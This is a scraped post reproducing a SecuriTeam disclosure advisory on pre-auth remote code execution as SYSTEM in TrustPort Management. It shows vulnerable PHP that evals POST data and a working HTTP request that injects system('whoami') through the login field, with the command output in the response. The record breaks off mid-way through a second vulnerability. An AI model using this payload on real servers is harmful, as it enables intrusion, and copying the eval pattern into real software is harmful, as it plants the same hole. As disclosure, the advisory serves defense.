{"id":12134,"date":"2018-04-25T14:19:11","date_gmt":"2018-04-25T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/25\/news-5903\/"},"modified":"2018-04-25T14:19:11","modified_gmt":"2018-04-25T22:19:11","slug":"news-5903","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/25\/news-5903\/","title":{"rendered":"SSD Advisory &#8211; TrustPort Management Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 25 Apr 2018 08:36:14 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3685\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3685');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> Multiple vulnerabilities in TrustPort&#8217;s management product allow remote unauthenticated attackers to cause the product to execute arbitrary code.<\/p>\n<p>TrustPort Management &#8220;offers you an effective and practical way to install centrally, configure and update antivirus software in your network and it enables mass administration of TrustPort products. Central administration from TrustPort brings you simple application of corporate security policies, monitoring of security incidents or the remote starting of tasks&#8221;.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vulnerability was reported to the vendor on March 6th, the following response was received on the 6th of March:<br \/> &#8220;thanks for information. We are going to correct the errors in following version of the SW.&#8221;<\/p>\n<p>No further response was received, though 3 more emails were sent by us to the company between the March 6th and the date of publication. We have no idea of how to resolve this bug, the only workaround is to not expose the administrative port to untrusted networks.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3685\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> <em>1. Pre-auth remote code execution vulnerability (as SYSTEM) in https:\/\/host:20394\/get\/settings-set-user.php.<\/em><\/p>\n<p>Requirements: No authentication is required to exploit this vulnerability.<\/p>\n<p>Vulnerable lines 25 to 29:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1ca7846944987\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">   foreach($_POST AS $key=&gt;$val) {      # Do objektu nastrkame hodnoty, ktere jsme ziskali s POSTu      $evalcode .= &#8216;$data-&gt;users-&gt;user-&gt;&#8217;.$key.&#8217;-&gt;data = &#8221;.$val.&#8221;;&#8217;;    }    @eval($evalcode);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>No validation is being done on user input before using eval on it.<\/p>\n<p>Exploitation request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1caf058581666\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/get\/settings-set-users.php HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Content-Length: 177  Origin: https:\/\/VULNERABLE_HOST:20394  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla  Content-Type: application\/x-www-form-urlencoded; charset=UTF-8  Accept: *\/*  Referer: https:\/\/VULNERABLE_HOST:20394\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8    action=update&amp;id=&amp;enabled=on&amp;login=admin&#8217;;system(&#8216;whoami&#8217;);\/\/&amp;loginpass=&amp;loginpass2=&amp;firstname=built-in&amp;surname=administrator&amp;email=&amp;lang=ENU<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1caf058581666-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1caf058581666-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">users<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">177<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-5\"><span class=\"crayon-v\">Origin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-6\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-7\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">urlencoded<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">UTF<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-9\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-10\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-11\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-12\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1caf058581666-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1caf058581666-14\"><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">enabled<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">login<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">admin<\/span><span class=\"crayon-s\">&#8216;;system(&#8216;<\/span><span class=\"crayon-i\">whoami<\/span>&#8216;<span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-c\">\/\/&amp;loginpass=&amp;loginpass2=&amp;firstname=built-in&amp;surname=administrator&amp;email=&amp;lang=ENU<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p>Response:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cb3517834940\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> nt authoritysystem  ({&#8220;success&#8221;:&#8221;false&#8221;,          &#8220;vipperResult&#8221;:&#8221;-2700&#8243;,          &#8220;resultDesc&#8221;:&#8221;ER_TPM_AUTHENTICATION_FAILED&#8221;        })<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb3517834940-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb3517834940-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb3517834940-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb3517834940-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb3517834940-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb3517834940-1\"><span class=\"crayon-e\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">authority<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-e\">system<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb3517834940-2\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;success&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;false&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb3517834940-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;vipperResult&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;-2700&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb3517834940-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;resultDesc&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ER_TPM_AUTHENTICATION_FAILED&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb3517834940-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><em>2. Pre-auth remote code execution vulnerability (as SYSTEM) in https:\/\/host:20394\/get\/settings-set-user-perms.php<\/em><\/p>\n<p>Requirements: No authentication is required to exploit this vulnerability.<\/p>\n<p>Vulnerable lines 16 to 25:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cb5385943372\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $evalcode = &#8221;;  foreach($_POST AS $key=&gt;$val) {    if (preg_match(&#8216;\/hide|perms|\/&#8217;,$key)) {      $key = str_replace(&#8216;|&#8217;,&#8217;-&gt;&#8217;,preg_replace(&#8216;\/hide|perms|\/&#8217;,&#8221;,$key));      $evalcode .= &#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;&#8217;.$key.&#8217;-&gt;data = &#8221;.$val.&#8221;;&#8217;;    }    $evalcode .= &#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[&#8216;rights&#8217;] = &#8221;.$_POST[&#8216;rights&#8217;].&#8221;;&#8217;;    $evalcode .= &#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[&#8216;id&#8217;] = &#8221;.$_POST[&#8216;id&#8217;].&#8221;;&#8217;;  }  @eval($evalcode);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb5385943372-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb5385943372-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb5385943372-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb5385943372-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb5385943372-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb5385943372-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb5385943372-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb5385943372-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb5385943372-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb5385943372-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb5385943372-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">evalcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb5385943372-2\"><span class=\"crayon-st\">foreach<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-e\">_POST <\/span><span class=\"crayon-st\">AS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">val<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb5385943372-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">preg_match<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/hide|perms|\/&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb5385943372-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str_replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;|&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;-&gt;&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">preg_replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/hide|perms|\/&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb5385943372-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">evalcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;-&gt;data = &#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">val<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8221;;&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb5385943372-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb5385943372-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">evalcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 